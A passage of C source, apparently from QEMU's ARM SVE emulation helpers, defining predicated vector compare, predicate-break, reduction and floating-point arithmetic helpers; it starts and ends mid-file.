DO_CMP_PPZZ_B(sve_cmpne_ppzz_b, uint8_t, !=) DO_CMP_PPZZ_H(sve_cmpne_ppzz_h, uint16_t, !=) DO_CMP_PPZZ_S(sve_cmpne_ppzz_s, uint32_t, !=) DO_CMP_PPZZ_D(sve_cmpne_ppzz_d, uint64_t, !=) DO_CMP_PPZZ_B(sve_cmpgt_ppzz_b, int8_t, >) DO_CMP_PPZZ_H(sve_cmpgt_ppzz_h, int16_t, >) DO_CMP_PPZZ_S(sve_cmpgt_ppzz_s, int32_t, >) DO_CMP_PPZZ_D(sve_cmpgt_ppzz_d, int64_t, >) DO_CMP_PPZZ_B(sve_cmpge_ppzz_b, int8_t, >=) DO_CMP_PPZZ_H(sve_cmpge_ppzz_h, int16_t, >=) DO_CMP_PPZZ_S(sve_cmpge_ppzz_s, int32_t, >=) DO_CMP_PPZZ_D(sve_cmpge_ppzz_d, int64_t, >=) DO_CMP_PPZZ_B(sve_cmphi_ppzz_b, uint8_t, >) DO_CMP_PPZZ_H(sve_cmphi_ppzz_h, uint16_t, >) DO_CMP_PPZZ_S(sve_cmphi_ppzz_s, uint32_t, >) DO_CMP_PPZZ_D(sve_cmphi_ppzz_d, uint64_t, >) DO_CMP_PPZZ_B(sve_cmphs_ppzz_b, uint8_t, >=) DO_CMP_PPZZ_H(sve_cmphs_ppzz_h, uint16_t, >=) DO_CMP_PPZZ_S(sve_cmphs_ppzz_s, uint32_t, >=) DO_CMP_PPZZ_D(sve_cmphs_ppzz_d, uint64_t, >=) #undef DO_CMP_PPZZ_B #undef DO_CMP_PPZZ_H #undef DO_CMP_PPZZ_S #undef DO_CMP_PPZZ_D #undef DO_CMP_PPZZ /* Similar, but the second source is "wide". */ #define DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ TYPEW mm = *(TYPEW *)((char *)vm + i - 8); \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= nn OP mm; \ } while (i & 7); \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZW_B(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZW_H(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZW_S(NAME, TYPE, TYPEW, OP) \ DO_CMP_PPZW(NAME, TYPE, TYPEW, OP, H1_4, 0x1111111111111111ull) DO_CMP_PPZW_B(sve_cmpeq_ppzw_b, int8_t, uint64_t, ==) DO_CMP_PPZW_H(sve_cmpeq_ppzw_h, int16_t, uint64_t, ==) DO_CMP_PPZW_S(sve_cmpeq_ppzw_s, int32_t, uint64_t, ==) DO_CMP_PPZW_B(sve_cmpne_ppzw_b, int8_t, uint64_t, !=) DO_CMP_PPZW_H(sve_cmpne_ppzw_h, int16_t, uint64_t, !=) DO_CMP_PPZW_S(sve_cmpne_ppzw_s, int32_t, uint64_t, !=) DO_CMP_PPZW_B(sve_cmpgt_ppzw_b, int8_t, int64_t, >) DO_CMP_PPZW_H(sve_cmpgt_ppzw_h, int16_t, int64_t, >) DO_CMP_PPZW_S(sve_cmpgt_ppzw_s, int32_t, int64_t, >) DO_CMP_PPZW_B(sve_cmpge_ppzw_b, int8_t, int64_t, >=) DO_CMP_PPZW_H(sve_cmpge_ppzw_h, int16_t, int64_t, >=) DO_CMP_PPZW_S(sve_cmpge_ppzw_s, int32_t, int64_t, >=) DO_CMP_PPZW_B(sve_cmphi_ppzw_b, uint8_t, uint64_t, >) DO_CMP_PPZW_H(sve_cmphi_ppzw_h, uint16_t, uint64_t, >) DO_CMP_PPZW_S(sve_cmphi_ppzw_s, uint32_t, uint64_t, >) DO_CMP_PPZW_B(sve_cmphs_ppzw_b, uint8_t, uint64_t, >=) DO_CMP_PPZW_H(sve_cmphs_ppzw_h, uint16_t, uint64_t, >=) DO_CMP_PPZW_S(sve_cmphs_ppzw_s, uint32_t, uint64_t, >=) DO_CMP_PPZW_B(sve_cmplt_ppzw_b, int8_t, int64_t, <) DO_CMP_PPZW_H(sve_cmplt_ppzw_h, int16_t, int64_t, <) DO_CMP_PPZW_S(sve_cmplt_ppzw_s, int32_t, int64_t, <) DO_CMP_PPZW_B(sve_cmple_ppzw_b, int8_t, int64_t, <=) DO_CMP_PPZW_H(sve_cmple_ppzw_h, int16_t, int64_t, <=) DO_CMP_PPZW_S(sve_cmple_ppzw_s, int32_t, int64_t, <=) DO_CMP_PPZW_B(sve_cmplo_ppzw_b, uint8_t, uint64_t, <) DO_CMP_PPZW_H(sve_cmplo_ppzw_h, uint16_t, uint64_t, <) DO_CMP_PPZW_S(sve_cmplo_ppzw_s, uint32_t, uint64_t, <) DO_CMP_PPZW_B(sve_cmpls_ppzw_b, uint8_t, uint64_t, <=) DO_CMP_PPZW_H(sve_cmpls_ppzw_h, uint16_t, uint64_t, <=) DO_CMP_PPZW_S(sve_cmpls_ppzw_s, uint32_t, uint64_t, <=) #undef DO_CMP_PPZW_B #undef DO_CMP_PPZW_H #undef DO_CMP_PPZW_S #undef DO_CMP_PPZW /* Similar, but the second source is immediate. */ #define DO_CMP_PPZI(NAME, TYPE, OP, H, MASK) \ uint32_t HELPER(NAME)(void *vd, void *vn, void *vg, uint32_t desc) \ { \ intptr_t opr_sz = simd_oprsz(desc); \ uint32_t flags = PREDTEST_INIT; \ TYPE mm = simd_data(desc); \ intptr_t i = opr_sz; \ do { \ uint64_t out = 0, pg; \ do { \ i -= sizeof(TYPE), out <<= sizeof(TYPE); \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ out |= nn OP mm; \ } while (i & 63); \ pg = *(uint64_t *)((char *)vg + (i >> 3)) & MASK; \ out &= pg; \ *(uint64_t *)((char *)vd + (i >> 3)) = out; \ flags = iter_predtest_bwd(out, pg, flags); \ } while (i > 0); \ return flags; \ } #define DO_CMP_PPZI_B(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1, 0xffffffffffffffffull) #define DO_CMP_PPZI_H(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1_2, 0x5555555555555555ull) #define DO_CMP_PPZI_S(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, H1_4, 0x1111111111111111ull) #define DO_CMP_PPZI_D(NAME, TYPE, OP) \ DO_CMP_PPZI(NAME, TYPE, OP, , 0x0101010101010101ull) DO_CMP_PPZI_B(sve_cmpeq_ppzi_b, uint8_t, ==) DO_CMP_PPZI_H(sve_cmpeq_ppzi_h, uint16_t, ==) DO_CMP_PPZI_S(sve_cmpeq_ppzi_s, uint32_t, ==) DO_CMP_PPZI_D(sve_cmpeq_ppzi_d, uint64_t, ==) DO_CMP_PPZI_B(sve_cmpne_ppzi_b, uint8_t, !=) DO_CMP_PPZI_H(sve_cmpne_ppzi_h, uint16_t, !=) DO_CMP_PPZI_S(sve_cmpne_ppzi_s, uint32_t, !=) DO_CMP_PPZI_D(sve_cmpne_ppzi_d, uint64_t, !=) DO_CMP_PPZI_B(sve_cmpgt_ppzi_b, int8_t, >) DO_CMP_PPZI_H(sve_cmpgt_ppzi_h, int16_t, >) DO_CMP_PPZI_S(sve_cmpgt_ppzi_s, int32_t, >) DO_CMP_PPZI_D(sve_cmpgt_ppzi_d, int64_t, >) DO_CMP_PPZI_B(sve_cmpge_ppzi_b, int8_t, >=) DO_CMP_PPZI_H(sve_cmpge_ppzi_h, int16_t, >=) DO_CMP_PPZI_S(sve_cmpge_ppzi_s, int32_t, >=) DO_CMP_PPZI_D(sve_cmpge_ppzi_d, int64_t, >=) DO_CMP_PPZI_B(sve_cmphi_ppzi_b, uint8_t, >) DO_CMP_PPZI_H(sve_cmphi_ppzi_h, uint16_t, >) DO_CMP_PPZI_S(sve_cmphi_ppzi_s, uint32_t, >) DO_CMP_PPZI_D(sve_cmphi_ppzi_d, uint64_t, >) DO_CMP_PPZI_B(sve_cmphs_ppzi_b, uint8_t, >=) DO_CMP_PPZI_H(sve_cmphs_ppzi_h, uint16_t, >=) DO_CMP_PPZI_S(sve_cmphs_ppzi_s, uint32_t, >=) DO_CMP_PPZI_D(sve_cmphs_ppzi_d, uint64_t, >=) DO_CMP_PPZI_B(sve_cmplt_ppzi_b, int8_t, <) DO_CMP_PPZI_H(sve_cmplt_ppzi_h, int16_t, <) DO_CMP_PPZI_S(sve_cmplt_ppzi_s, int32_t, <) DO_CMP_PPZI_D(sve_cmplt_ppzi_d, int64_t, <) DO_CMP_PPZI_B(sve_cmple_ppzi_b, int8_t, <=) DO_CMP_PPZI_H(sve_cmple_ppzi_h, int16_t, <=) DO_CMP_PPZI_S(sve_cmple_ppzi_s, int32_t, <=) DO_CMP_PPZI_D(sve_cmple_ppzi_d, int64_t, <=) DO_CMP_PPZI_B(sve_cmplo_ppzi_b, uint8_t, <) DO_CMP_PPZI_H(sve_cmplo_ppzi_h, uint16_t, <) DO_CMP_PPZI_S(sve_cmplo_ppzi_s, uint32_t, <) DO_CMP_PPZI_D(sve_cmplo_ppzi_d, uint64_t, <) DO_CMP_PPZI_B(sve_cmpls_ppzi_b, uint8_t, <=) DO_CMP_PPZI_H(sve_cmpls_ppzi_h, uint16_t, <=) DO_CMP_PPZI_S(sve_cmpls_ppzi_s, uint32_t, <=) DO_CMP_PPZI_D(sve_cmpls_ppzi_d, uint64_t, <=) #undef DO_CMP_PPZI_B #undef DO_CMP_PPZI_H #undef DO_CMP_PPZI_S #undef DO_CMP_PPZI_D #undef DO_CMP_PPZI /* Similar to the ARM LastActive pseudocode function. */ static bool last_active_pred(void *vd, void *vg, intptr_t oprsz) { intptr_t i; for (i = QEMU_ALIGN_UP(oprsz, 8) - 8; i >= 0; i -= 8) { uint64_t pg = *(uint64_t *)((char *)vg + i); if (pg) { return (pow2floor(pg) & *(uint64_t *)((char *)vd + i)) != 0; } } return 0; } /* Compute a mask into RETB that is true for all G, up to and including * (if after) or excluding (if !after) the first G & N. * Return true if BRK found. */ static bool compute_brk(uint64_t *retb, uint64_t n, uint64_t g, bool brk, bool after) { uint64_t b; if (brk) { b = 0; } else if ((g & n) == 0) { /* For all G, no N are set; break not found. */ b = g; } else { /* Break somewhere in N. Locate it. */ b = g & n; /* guard true, pred true */ #ifdef _MSC_VER b = b & (0 - b); /* first such */ #else b = b & -b; /* first such */ #endif if (after) { b = b | (b - 1); /* break after same */ } else { b = b - 1; /* break before same */ } brk = true; } *retb = b; return brk; } /* Compute a zeroing BRK. */ static void compute_brk_z(uint64_t *d, uint64_t *n, uint64_t *g, intptr_t oprsz, bool after) { bool brk = false; intptr_t i; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) { uint64_t this_b, this_g = g[i]; brk = compute_brk(&this_b, n[i], this_g, brk, after); d[i] = this_b & this_g; } } /* Likewise, but also compute flags. */ static uint32_t compute_brks_z(uint64_t *d, uint64_t *n, uint64_t *g, intptr_t oprsz, bool after) { uint32_t flags = PREDTEST_INIT; bool brk = false; intptr_t i; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) { uint64_t this_b, this_d, this_g = g[i]; brk = compute_brk(&this_b, n[i], this_g, brk, after); d[i] = this_d = this_b & this_g; flags = iter_predtest_fwd(this_d, this_g, flags); } return flags; } /* Compute a merging BRK. */ static void compute_brk_m(uint64_t *d, uint64_t *n, uint64_t *g, intptr_t oprsz, bool after) { bool brk = false; intptr_t i; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) { uint64_t this_b, this_g = g[i]; brk = compute_brk(&this_b, n[i], this_g, brk, after); d[i] = (this_b & this_g) | (d[i] & ~this_g); } } /* Likewise, but also compute flags. */ static uint32_t compute_brks_m(uint64_t *d, uint64_t *n, uint64_t *g, intptr_t oprsz, bool after) { uint32_t flags = PREDTEST_INIT; bool brk = false; intptr_t i; for (i = 0; i < oprsz / 8; ++i) { uint64_t this_b, this_d = d[i], this_g = g[i]; brk = compute_brk(&this_b, n[i], this_g, brk, after); d[i] = this_d = (this_b & this_g) | (this_d & ~this_g); flags = iter_predtest_fwd(this_d, this_g, flags); } return flags; } static uint32_t do_zero(ARMPredicateReg *d, intptr_t oprsz) { /* It is quicker to zero the whole predicate than loop on OPRSZ. * The compiler should turn this into 4 64-bit integer stores. */ memset(d, 0, sizeof(ARMPredicateReg)); return PREDTEST_INIT; } void HELPER(sve_brkpa)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { compute_brk_z(vd, vm, vg, oprsz, true); } else { do_zero(vd, oprsz); } } uint32_t HELPER(sve_brkpas)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return compute_brks_z(vd, vm, vg, oprsz, true); } else { return do_zero(vd, oprsz); } } void HELPER(sve_brkpb)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { compute_brk_z(vd, vm, vg, oprsz, false); } else { do_zero(vd, oprsz); } } uint32_t HELPER(sve_brkpbs)(void *vd, void *vn, void *vm, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return compute_brks_z(vd, vm, vg, oprsz, false); } else { return do_zero(vd, oprsz); } } void HELPER(sve_brka_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_z(vd, vn, vg, oprsz, true); } uint32_t HELPER(sve_brkas_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_z(vd, vn, vg, oprsz, true); } void HELPER(sve_brkb_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_z(vd, vn, vg, oprsz, false); } uint32_t HELPER(sve_brkbs_z)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_z(vd, vn, vg, oprsz, false); } void HELPER(sve_brka_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_m(vd, vn, vg, oprsz, true); } uint32_t HELPER(sve_brkas_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_m(vd, vn, vg, oprsz, true); } void HELPER(sve_brkb_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; compute_brk_m(vd, vn, vg, oprsz, false); } uint32_t HELPER(sve_brkbs_m)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; return compute_brks_m(vd, vn, vg, oprsz, false); } void HELPER(sve_brkn)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (!last_active_pred(vn, vg, oprsz)) { do_zero(vd, oprsz); } } /* As if PredTest(Ones(PL), D, esz). */ static uint32_t predtest_ones(ARMPredicateReg *d, intptr_t oprsz, uint64_t esz_mask) { uint32_t flags = PREDTEST_INIT; intptr_t i; for (i = 0; i < oprsz / 8; i++) { flags = iter_predtest_fwd(d->p[i], esz_mask, flags); } if (oprsz & 7) { uint64_t mask = ~(0xffffffffffffffffULL << (8 * (oprsz & 7))); flags = iter_predtest_fwd(d->p[i], esz_mask & mask, flags); } return flags; } uint32_t HELPER(sve_brkns)(void *vd, void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; if (last_active_pred(vn, vg, oprsz)) { return predtest_ones(vd, oprsz, -1); } else { return do_zero(vd, oprsz); } } uint64_t HELPER(sve_cntp)(void *vn, void *vg, uint32_t pred_desc) { intptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint64_t *n = vn, *g = vg, sum = 0, mask = pred_esz_masks[esz]; intptr_t i; for (i = 0; i < DIV_ROUND_UP(oprsz, 8); ++i) { uint64_t t = n[i] & g[i] & mask; sum += ctpop64(t); } return sum; } uint32_t HELPER(sve_while)(void *vd, uint32_t count, uint32_t pred_desc) { uintptr_t oprsz = extract32(pred_desc, 0, SIMD_OPRSZ_BITS) + 2; intptr_t esz = extract32(pred_desc, SIMD_DATA_SHIFT, 2); uint64_t esz_mask = pred_esz_masks[esz]; ARMPredicateReg *d = vd; uint32_t flags; intptr_t i; /* Begin with a zero predicate register. */ flags = do_zero(d, oprsz); if (count == 0) { return flags; } /* Set all of the requested bits. */ for (i = 0; i < count / 64; ++i) { d->p[i] = esz_mask; } if (count & 63) { d->p[i] = MAKE_64BIT_MASK(0, count & 63) & esz_mask; } return predtest_ones(d, oprsz, esz_mask); } /* Recursive reduction on a function; * C.f. the ARM ARM function ReducePredicated. * * While it would be possible to write this without the DATA temporary, * it is much simpler to process the predicate register this way. * The recursion is bounded to depth 7 (128 fp16 elements), so there's * little to gain with a more complex non-recursive form. */ #define DO_REDUCE(NAME, TYPE, H, FUNC, IDENT) \ static TYPE NAME##_reduce(TYPE *data, float_status *status, uintptr_t n) \ { \ if (n == 1) { \ return *data; \ } else { \ uintptr_t half = n / 2; \ TYPE lo = NAME##_reduce(data, status, half); \ TYPE hi = NAME##_reduce(data + half, status, half); \ return TYPE##_##FUNC(lo, hi, status); \ } \ } \ uint64_t HELPER(NAME)(void *vn, void *vg, void *vs, uint32_t desc) \ { \ uintptr_t i, oprsz = simd_oprsz(desc), maxsz = simd_maxsz(desc); \ TYPE data[sizeof(ARMVectorReg) / sizeof(TYPE)]; \ for (i = 0; i < oprsz; ) { \ uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); \ do { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)data + i) = (pg & 1 ? nn : IDENT); \ i += sizeof(TYPE), pg >>= sizeof(TYPE); \ } while (i & 15); \ } \ for (; i < maxsz; i += sizeof(TYPE)) { \ *(TYPE *)((char *)data + i) = IDENT; \ } \ return NAME##_reduce(data, vs, maxsz / sizeof(TYPE)); \ } DO_REDUCE(sve_faddv_h, float16, H1_2, add, float16_zero) DO_REDUCE(sve_faddv_s, float32, H1_4, add, float32_zero) DO_REDUCE(sve_faddv_d, float64, , add, float64_zero) /* Identity is floatN_default_nan, without the function call. */ DO_REDUCE(sve_fminnmv_h, float16, H1_2, minnum, 0x7E00) DO_REDUCE(sve_fminnmv_s, float32, H1_4, minnum, 0x7FC00000) DO_REDUCE(sve_fminnmv_d, float64, , minnum, 0x7FF8000000000000ULL) DO_REDUCE(sve_fmaxnmv_h, float16, H1_2, maxnum, 0x7E00) DO_REDUCE(sve_fmaxnmv_s, float32, H1_4, maxnum, 0x7FC00000) DO_REDUCE(sve_fmaxnmv_d, float64, , maxnum, 0x7FF8000000000000ULL) DO_REDUCE(sve_fminv_h, float16, H1_2, min, float16_infinity) DO_REDUCE(sve_fminv_s, float32, H1_4, min, float32_infinity) DO_REDUCE(sve_fminv_d, float64, , min, float64_infinity) DO_REDUCE(sve_fmaxv_h, float16, H1_2, max, float16_chs(float16_infinity)) DO_REDUCE(sve_fmaxv_s, float32, H1_4, max, float32_chs(float32_infinity)) DO_REDUCE(sve_fmaxv_d, float64, , max, float64_chs(float64_infinity)) #undef DO_REDUCE uint64_t HELPER(sve_fadda_h)(uint64_t nn, void *vm, void *vg, void *status, uint32_t desc) { intptr_t i = 0, opr_sz = simd_oprsz(desc); float16 result = nn; do { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { float16 mm = *(float16 *)((char *)vm + H1_2(i)); result = float16_add(result, mm, status); } i += sizeof(float16), pg >>= sizeof(float16); } while (i & 15); } while (i < opr_sz); return result; } uint64_t HELPER(sve_fadda_s)(uint64_t nn, void *vm, void *vg, void *status, uint32_t desc) { intptr_t i = 0, opr_sz = simd_oprsz(desc); float32 result = nn; do { uint16_t pg = *(uint16_t *)((char *)vg + H1_2(i >> 3)); do { if (pg & 1) { float32 mm = *(float32 *)((char *)vm + H1_2(i)); result = float32_add(result, mm, status); } i += sizeof(float32), pg >>= sizeof(float32); } while (i & 15); } while (i < opr_sz); return result; } uint64_t HELPER(sve_fadda_d)(uint64_t nn, void *vm, void *vg, void *status, uint32_t desc) { intptr_t i = 0, opr_sz = simd_oprsz(desc) / 8; uint64_t *m = vm; uint8_t *pg = vg; for (i = 0; i < opr_sz; i++) { if (pg[H1(i)] & 1) { nn = float64_add(nn, m[i], status); } } return nn; } /* Fully general three-operand expander, controlled by a predicate, * With the extra float_status parameter. */ #define DO_ZPZZ_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *vg, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ TYPE mm = *(TYPE *)((char *)vm + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm, status); \ } \ } while (i & 63); \ } while (i != 0); \ } DO_ZPZZ_FP(sve_fadd_h, uint16_t, H1_2, float16_add) DO_ZPZZ_FP(sve_fadd_s, uint32_t, H1_4, float32_add) DO_ZPZZ_FP(sve_fadd_d, uint64_t, , float64_add) DO_ZPZZ_FP(sve_fsub_h, uint16_t, H1_2, float16_sub) DO_ZPZZ_FP(sve_fsub_s, uint32_t, H1_4, float32_sub) DO_ZPZZ_FP(sve_fsub_d, uint64_t, , float64_sub) DO_ZPZZ_FP(sve_fmul_h, uint16_t, H1_2, float16_mul) DO_ZPZZ_FP(sve_fmul_s, uint32_t, H1_4, float32_mul) DO_ZPZZ_FP(sve_fmul_d, uint64_t, , float64_mul) DO_ZPZZ_FP(sve_fdiv_h, uint16_t, H1_2, float16_div) DO_ZPZZ_FP(sve_fdiv_s, uint32_t, H1_4, float32_div) DO_ZPZZ_FP(sve_fdiv_d, uint64_t, , float64_div) DO_ZPZZ_FP(sve_fmin_h, uint16_t, H1_2, float16_min) DO_ZPZZ_FP(sve_fmin_s, uint32_t, H1_4, float32_min) DO_ZPZZ_FP(sve_fmin_d, uint64_t, , float64_min) DO_ZPZZ_FP(sve_fmax_h, uint16_t, H1_2, float16_max) DO_ZPZZ_FP(sve_fmax_s, uint32_t, H1_4, float32_max) DO_ZPZZ_FP(sve_fmax_d, uint64_t, , float64_max) DO_ZPZZ_FP(sve_fminnum_h, uint16_t, H1_2, float16_minnum) DO_ZPZZ_FP(sve_fminnum_s, uint32_t, H1_4, float32_minnum) DO_ZPZZ_FP(sve_fminnum_d, uint64_t, , float64_minnum) DO_ZPZZ_FP(sve_fmaxnum_h, uint16_t, H1_2, float16_maxnum) DO_ZPZZ_FP(sve_fmaxnum_s, uint32_t, H1_4, float32_maxnum) DO_ZPZZ_FP(sve_fmaxnum_d, uint64_t, , float64_maxnum) static inline float16 abd_h(float16 a, float16 b, float_status *s) { return float16_abs(float16_sub(a, b, s)); } static inline float32 abd_s(float32 a, float32 b, float_status *s) { return float32_abs(float32_sub(a, b, s)); } static inline float64 abd_d(float64 a, float64 b, float_status *s) { return float64_abs(float64_sub(a, b, s)); } DO_ZPZZ_FP(sve_fabd_h, uint16_t, H1_2, abd_h) DO_ZPZZ_FP(sve_fabd_s, uint32_t, H1_4, abd_s) DO_ZPZZ_FP(sve_fabd_d, uint64_t, , abd_d) static inline float64 scalbn_d(float64 a, int64_t b, float_status *s) { int b_int = MIN(MAX(b, INT_MIN), INT_MAX); return float64_scalbn(a, b_int, s); } DO_ZPZZ_FP(sve_fscalbn_h, int16_t, H1_2, float16_scalbn) DO_ZPZZ_FP(sve_fscalbn_s, int32_t, H1_4, float32_scalbn) DO_ZPZZ_FP(sve_fscalbn_d, int64_t, , scalbn_d) DO_ZPZZ_FP(sve_fmulx_h, uint16_t, H1_2, helper_advsimd_mulxh) DO_ZPZZ_FP(sve_fmulx_s, uint32_t, H1_4, helper_vfp_mulxs) DO_ZPZZ_FP(sve_fmulx_d, uint64_t, , helper_vfp_mulxd) #undef DO_ZPZZ_FP /* Three-operand expander, with one scalar operand, controlled by * a predicate, with the extra float_status parameter. */ #define DO_ZPZS_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, uint64_t scalar, \ void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ TYPE mm = scalar; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, mm, status); \ } \ } while (i & 63); \ } while (i != 0); \ } DO_ZPZS_FP(sve_fadds_h, float16, H1_2, float16_add) DO_ZPZS_FP(sve_fadds_s, float32, H1_4, float32_add) DO_ZPZS_FP(sve_fadds_d, float64, , float64_add) DO_ZPZS_FP(sve_fsubs_h, float16, H1_2, float16_sub) DO_ZPZS_FP(sve_fsubs_s, float32, H1_4, float32_sub) DO_ZPZS_FP(sve_fsubs_d, float64, , float64_sub) DO_ZPZS_FP(sve_fmuls_h, float16, H1_2, float16_mul) DO_ZPZS_FP(sve_fmuls_s, float32, H1_4, float32_mul) DO_ZPZS_FP(sve_fmuls_d, float64, , float64_mul) static inline float16 subr_h(float16 a, float16 b, float_status *s) { return float16_sub(b, a, s); } static inline float32 subr_s(float32 a, float32 b, float_status *s) { return float32_sub(b, a, s); } static inline float64 subr_d(float64 a, float64 b, float_status *s) { return float64_sub(b, a, s); } DO_ZPZS_FP(sve_fsubrs_h, float16, H1_2, subr_h) DO_ZPZS_FP(sve_fsubrs_s, float32, H1_4, subr_s) DO_ZPZS_FP(sve_fsubrs_d, float64, , subr_d) DO_ZPZS_FP(sve_fmaxnms_h, float16, H1_2, float16_maxnum) DO_ZPZS_FP(sve_fmaxnms_s, float32, H1_4, float32_maxnum) DO_ZPZS_FP(sve_fmaxnms_d, float64, , float64_maxnum) DO_ZPZS_FP(sve_fminnms_h, float16, H1_2, float16_minnum) DO_ZPZS_FP(sve_fminnms_s, float32, H1_4, float32_minnum) DO_ZPZS_FP(sve_fminnms_d, float64, , float64_minnum) DO_ZPZS_FP(sve_fmaxs_h, float16, H1_2, float16_max) DO_ZPZS_FP(sve_fmaxs_s, float32, H1_4, float32_max) DO_ZPZS_FP(sve_fmaxs_d, float64, , float64_max) DO_ZPZS_FP(sve_fmins_h, float16, H1_2, float16_min) DO_ZPZS_FP(sve_fmins_s, float32, H1_4, float32_min) DO_ZPZS_FP(sve_fmins_d, float64, , float64_min) /* Fully general two-operand expander, controlled by a predicate, * With the extra float_status parameter. */ #define DO_ZPZ_FP(NAME, TYPE, H, OP) \ void HELPER(NAME)(void *vd, void *vn, void *vg, void *status, uint32_t desc) \ { \ intptr_t i = simd_oprsz(desc); \ uint64_t *g = vg; \ do { \ uint64_t pg = g[(i - 1) >> 6]; \ do { \ i -= sizeof(TYPE); \ if (likely((pg >> (i & 63)) & 1)) { \ TYPE nn = *(TYPE *)((char *)vn + H(i)); \ *(TYPE *)((char *)vd + H(i)) = OP(nn, status); \ } \ } while (i & 63); \ } while (i != 0); \ } /* SVE fp16 conversions always use IEEE mode. Like AdvSIMD, they ignore * FZ16. When converting from fp16, this affects flushing input denormals; * when converting to fp16, this affects flushing output denormals. */ static inline float32 sve_f16_to_f32(float16 f, float_status *fpst) { flag save = get_flush_inputs_to_zero(fpst); float32 ret; set_flush_inputs_to_zero(false, fpst); ret = float16_to_float32(f, true, fpst); set_flush_inputs_to_zero(save, fpst); return ret; } static inline float64 sve_f16_to_f64(float16 f, float_status *fpst) { flag save = get_flush_inputs_to_zero(fpst); float64 ret; set_flush_inputs_to_zero(false, fpst); ret = float16_to_float64(f, true, fpst); set_flush_inputs_to_zero(save, fpst); return ret; } static inline float16 sve_f32_to_f16(float32 f, float_status *fpst) { flag save = get_flush_to_zero(fpst); float16 ret; set_flush_to_zero(false, fpst); ret = float32_to_float16(f, true, fpst); set_flush_to_zero(save, fpst); return ret; } static inline float16 sve_f64_to_f16(float64 f, float_status *fpst) { flag save = get_flush_to_zero(fpst); float16 ret; set_flush_to_zero(false, fpst); ret = 